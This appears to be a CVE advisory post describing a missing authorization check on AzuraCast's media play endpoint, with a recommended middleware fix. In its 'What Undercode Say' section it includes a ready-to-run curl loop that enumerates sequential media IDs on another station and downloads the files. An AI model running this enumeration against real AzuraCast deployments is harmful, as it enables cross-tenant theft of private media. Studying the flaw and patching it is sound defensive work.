Listen to this Post
How the mentioned CVE works:
The `GET /api/station/{station_id}/file/{id}/play` endpoint in AzuraCast lacks the `Middleware\Permissions` check that protects sibling routes like /file/{id}. The vulnerable route group (lines 407-429 in api_station.php) defines four endpoints: GET, PUT, DELETE with permission middleware, and GET `/play` without it. The middleware chain for `/play` includes GetStation, RequireStation, RequireLogin, and StationSupportsFeature(Media), but `RequireLogin` only verifies a valid session/API key – no station-level permissions. The controller `PlayAction.php:84` calls $this->mediaRepo->requireForStation($id, $station), which checks media belongs to station but not authorization. The `findForStation` method (repository lines 46-66) accepts sequential integer IDs, enabling trivial enumeration. This regression mirrors a previous fix (commit 7fbc7dd, 2026-02-26) that missed the `/play` route. An authenticated user with permissions only on Station A can download any media from Station B via simple sequential ID guesses, as shown in the PoC. The impact is high confidentiality breach, allowing cross-station media exfiltration in multi-tenant deployments.
dailycve form:
Platform: AzuraCast
Version: Unpatched (pre-commit)
Vulnerability: Missing permissions check
Severity: Critical
date: 2026-02-26
Prediction: 2026-03-05
What Undercode Say:
Enumerate media files from unauthorized station (station_id=2)
for id in {1..100}; do
curl -H "X-API-Key: $API_KEY" \
"https://target/api/station/2/file/$id/play" \
-o "stolen_$id.mp3" --fail --silent
done
Verify permission check on protected endpoint
curl -H "X-API-Key: $API_KEY" \
https://target/api/station/2/file/1
Expected: 403 Forbidden
Check if /play bypasses
curl -I -H "X-API-Key: $API_KEY" \
https://target/api/station/2/file/1/play
Returns 200 OK if vulnerable
Exploit:
Attacker needs any valid API key or session. Requests `GET /api/station/{victim_station_id}/file/{sequential_id}/play` with that key. No station permission required. Media files are returned as binary content (MP3, FLAC, etc.). Enumeration uses auto-increment integers from `StationMedia` table.
Protection from this CVE
Add `Middleware\Permissions(StationPermissions::Media, true)` to the `/play` route in api_station.php, line 426-427. Example:
$group->get('/play', Controller\Api\Stations\Files\PlayAction::class)
->setName('api:stations:files:play')
->add(new Middleware\Permissions(StationPermissions::Media, true));
Alternatively, apply group-level middleware to the entire `/file/{id}` group.
Impact:
- Confidentiality: High – full media file contents exposed.
- Any authenticated user exfiltrates any station’s entire media library.
- Multi-tenant hosting providers: cross-tenant data theft.
- Trivial enumeration via sequential IDs. No privilege escalation needed beyond login.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
